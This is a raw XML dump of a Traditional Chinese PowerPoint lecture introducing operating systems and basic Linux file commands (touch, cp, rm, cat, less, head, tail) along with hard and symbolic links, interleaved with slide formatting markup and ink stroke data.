0-15,1 0-1,0 0-15,-18 0 16,-18 0-16,1 0 15,17 0-15,-18 0 16,1 0-16,34 0 16,-16 0-16,16 0 15,1 0-15,0 0 16,17 0-16,0 0 16,1 0-1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11.21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269 14623 0,'-18'-18'16,"0"18"31,1 0-32,-19 0 1,19 0 0,-1 0-1,-52 0-15,34 0 16,19 18-16,-19-1 15,19-17 1,-1 0-16,0 0 63,1-17-48,-1 17 1,1-18-16,-1 18 15,0-18 32,1 18 0,-1-17-31,0 17 15,1 0-15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16.14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510 15998 0,'18'0'46,"-1"0"-30,1 0 0,35 0-1,0 0-15,17 0 16,301 0 0,-265 0-1,141 0 1,-106 0-1,-106 0 1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17.02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592 15893 0,'0'0'0,"52"0"15,19 0-15,-18 0 16,141 0-1,141 0 1,-123 0 0,35 0-16,17 0 15,54 0-15,17 0 16,0 0-16,18 0 16,-124 0-16,0 0 15,-70 0-15,-35 0 16,-54 0-16,-34-18 15,-54 18 32,0-18-47,1 18 16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85221" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="36.86007" units="1/cm"/>
          <inkml:channelProperty channel="T" name="resolution" value="1" units="1/dev"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2021-05-24T01:26:20.6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756 6773 0,'17'0'32,"1"0"-17,17 0-15,-17 0 16,35 0 0,-18 0-16,36 0 15,34 0 1,54 0-1,-88 0-15,-1 0 16,1 0-16,-18 0 16,35 0-1,-70 0 1,-1 18 46,19-18-46,-19 0 0,18 0-1,-17 0 1,70 0 15,-70 0-31,17 0 0,-17 0 16,17 18-16,0-18 15,1 0-15,17 0 16,-18 0-16,-17 0 16,34 0-16,-16 0 15,-1 0 1,0 0-16,-17 17 16,0-17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2950"/>
            <a:ext cx="4965700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4"/>
            <a:ext cx="5438775" cy="446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1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5" tIns="45723" rIns="91445" bIns="457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fld id="{802A8E05-228F-4E7E-BE4F-38EC0A4C3C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8833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fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1"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1pPr>
    <a:lvl2pPr marL="457200" algn="just" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1"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2pPr>
    <a:lvl3pPr marL="914400" algn="just" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1"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3pPr>
    <a:lvl4pPr marL="1371600" algn="just" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1"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4pPr>
    <a:lvl5pPr marL="1828800" algn="just" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" sz="1400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-12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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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267.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:student@127.0.0.1" TargetMode="External"/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2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2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2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2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2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2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2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2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2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2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2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2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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide2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各位同學，接下來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35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小時的課程，跟各位講授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資訊作業專長班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作業系統概論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」的課程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8713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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我們可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>看成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>資源分配者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。在電腦系統中有許多資源，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>時間、記憶體空間、檔案儲存和輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>輸出裝置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等，作業系統必須決定那一種安排可以使電腦系統作最有效、最公平的處理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746874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m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從檔案結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及磁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檔案中的檔案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m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列表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r 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遞迴刪除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f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強制刪除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0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6596612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v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移動和復制目錄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v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列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來源檔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的檔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f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—force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若目標檔案或目錄與現有的檔案或目錄重複，則直接覆蓋現有的檔案或目錄，不給予提示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1815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baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>collec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/easy/eat/egg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch  drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> .\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>collec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="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71255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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –r  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/easy/eat/egg  ./common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>在預設的狀況下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>的來源檔與目的檔的權限是不同的，目的檔的擁有者通常是指令操作者本身</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> dark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –r .\collec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817525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ouch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修改檔案時間或建置新檔。</a:t>
            </a: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tim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內容資料變更，更新此時間。</a:t>
            </a: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tim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狀態變更，更新此時間。</a:t>
            </a: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atim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內容被取用，更新此時間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6984166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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>non-login shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的環境設定檔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> --time=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>atime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> --time=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ctime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bashrc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>依序為：修改、存取及更動時間</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch -d "2 days ago"  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2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch -d "1 min ago" foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch --date="2008/10/02" foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch -date="2008/10/02 09:21" foo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0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023590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less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令的用法與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令類似，也可以用來瀏覽超過一頁的檔案。所不同的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令除了可以按空格鍵向下顯示檔案外，還可以利用上下鍵來捲動檔案。當要結束瀏覽時，只要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令的提示符“：”下按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵即</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令是一般用於要顯示的內容會超過一個畫面長度的情況。為了避免畫面顯示時瞬間就閃過去，用戶可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令，讓畫面在顯示滿一頁時暫停，此時可按空格健繼續顯示下一個畫面，或按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵停止顯示。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.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ess: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與 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ore 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類似，可以往前翻頁，已分頁方式看</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.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head: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顯示檔案的前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0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行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" eaLnBrk="1" fontAlgn="t" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" dirty="0" smtClean="0"/>
              <a:t>5.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il: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顯示檔案的後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0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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行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0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0916735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cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.cat -n foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.more foo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0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778774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less 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messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/user ?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(/word 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?word)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.head -n 20 foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.head -n 15 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messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>5.tail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-n 15 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messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PS.nl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顯示時候順便輸出行號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>不顯示空白行號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0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0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2628996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400" dirty="0" smtClean="0"/>
              <a:t>單純的檔案複製方式，會佔用磁碟空間。例如使用者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>cassia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>在 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var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tmp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目錄中，存放一個大小為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>1502892 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的檔案名稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>，若使用者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>lambert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>也要用這個檔案，他可以將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne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複製到自己的目錄中，如此一來， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne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就分處兩地，整整佔用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>3005784 bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的磁碟空間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0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273244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常見的作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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有以下</a:t>
            </a:r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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX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DOS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Linux/FreeBSD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Mac OS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Embedded Operation System(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嵌入式作業系統)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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>家族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379047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2600" dirty="0" smtClean="0"/>
              <a:t>為何需要連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>系統是多人多工作業系統，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>過去半導體技術不如現今發達，過去硬體資源有限及昂貴。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>是否有更節省資源的方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>建立連結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小容量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可以解省大量的空間</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>直接指向或是間接指標</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>中兩種連結</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>實體連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>建一個指標直接指向一個檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>軟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>符號連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>對一個檔案的間接指標。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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547475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硬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實體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特徵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指標直接指向了一個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位址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硬連結和原始檔案使用了相同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檔案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連結數會從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
